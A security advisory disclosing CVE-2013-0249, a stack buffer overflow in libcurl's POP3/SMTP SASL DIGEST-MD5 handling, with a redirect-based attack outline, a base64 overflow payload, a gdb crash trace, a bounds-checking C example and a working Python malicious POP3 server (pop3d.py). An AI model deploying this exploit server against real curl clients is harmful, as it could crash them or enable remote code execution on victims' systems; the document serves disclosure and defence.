cURL Buffer Overflow Vulnerability
Source: http://evilserver.com/  Author: Volema  Published: 2013-02-18
cURL buffer overflow
Wed 06 February 2013

Volema found a remotely exploitable buffer overflow in the libcurl POP3 and SMTP protocol handlers that can lead to remote code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses data provided by the server without proper length checks, and that data is then appended to a fixed-size local buffer on the stack.

The vendor was notified and CVE-2013-0249 was released.

Attack Concept Outline

Assume we are able to make the target issue custom HTTP requests through curl. We send a request to our own server, http://evilserver.com/:

GET / HTTP/1.0
Host: evilserver.com

The server answers with a redirect:

HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/.

"Smart" curl interprets the redirect and connects to evilserver.com on port 110/TCP using the POP3 protocol. The server answers

+OK POP3 server ready

curl sends

CAPA

and the server answers, advertising DIGEST-MD5 as the only SASL mechanism:

+OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumbydumb POP3 server

So libcurl has to send

AUTH DIGEST-MD5

and the server then sends the payload

+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=

The overflow happens because the decoded realm value is copied into a fixed-size buffer:

realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8
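The decoded challenge above, run through a bounds-checked key/value extractor: an added example, not libcurl's code, showing the length check the advisory describes as missing. The buffer sizes and the build_challenge helper are illustrative; the 128-byte realm is taken from the PoC.

```c
#include <stdio.h>
#include <string.h>

/* Copy the value after key, up to the end delimiter, into out[outlen]. Returns -1
   if the key is absent or the value plus NUL would not fit: the length check the
   advisory says the vulnerable code lacked. */
static int get_key_value(const char *chlg, const char *key, char *out,
                         size_t outlen, char end)
{
    const char *start = strstr(chlg, key);
    const char *stop = start ? strchr(start += strlen(key), end) : NULL;
    if (!stop)
        return -1;                        /* key absent or value unterminated */
    size_t len = (size_t)(stop - start);
    if (len >= outlen)
        return -1;                        /* too long for the caller's buffer */
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

/* Extract realm and nonce: 0 on success, -1 if malformed or a value is too long. */
int parse_digest_challenge(const char *chlg, char *realm, size_t realm_len,
                           char *nonce, size_t nonce_len)
{
    if (get_key_value(chlg, "realm=\"", realm, realm_len, '"') < 0)
        return -1;
    return get_key_value(chlg, "nonce=\"", nonce, nonce_len, '"');
}

/* Constructed input: the advisory's decoded challenge with a realm of n 'A's. */
int build_challenge(char *buf, size_t buflen, size_t n)
{
    const char *tail = "\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\",algorithm=md5-sess,charset=utf-8";
    if (buflen < 7 + n + strlen(tail) + 1)
        return -1;                        /* buf cannot hold the challenge */
    memcpy(buf, "realm=\"", 7);
    memset(buf + 7, 'A', n);
    strcpy(buf + 7 + n, tail);
    return 0;
}

int main(void)
{
    char chlg[512], realm[128], nonce[64];  /* 128: the realm length in the PoC */
    build_challenge(chlg, sizeof chlg, 128);
    printf("128-byte realm: %s\n", parse_digest_challenge(chlg, realm, sizeof realm,
           nonce, sizeof nonce) < 0 ? "rejected" : "accepted");
    return 0;
}
```

A 128-byte realm needs 129 bytes including the terminator, so it is refused; a 127-byte one is accepted.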

This is how it looks in gdb:

Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()
   from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000

Original exploit: pop3d.py.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC

import socket
import base64

host = "localhost"
port = 110

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send('+OK POP3 server ready\n')
while True:
    buf = sock.recv(1024)
    print buf
    if buf.find('USER') > -1:
        sock.send('+OK\n')
    if buf.find('PASS') > -1:
        sock.send('-ERR 999\n')
    if buf.find('CAPA') > -1:
        resp =  '+OK List of capabilities follows\n'
        resp += 'SASL DIGEST-MD5\n'
        resp += 'IMPLEMENTATION dumbydumb POP3 server\n'
        resp += '.\n'
        sock.send(resp)
    if buf.find('QUIT') > -1:
        sock.send('+OK')
        break
    if buf.find('AUTH') > -1:
        realm = 'A'*128
        payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm
        resp = '+ '+base64.b64encode(payload)+'\n'
        print resp
        sock.send(resp)
sock.close()


Mitigation

We recommend restricting your application to HTTP(S) by disabling all other protocols with the CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS options, and updating libcurl to a fixed version.
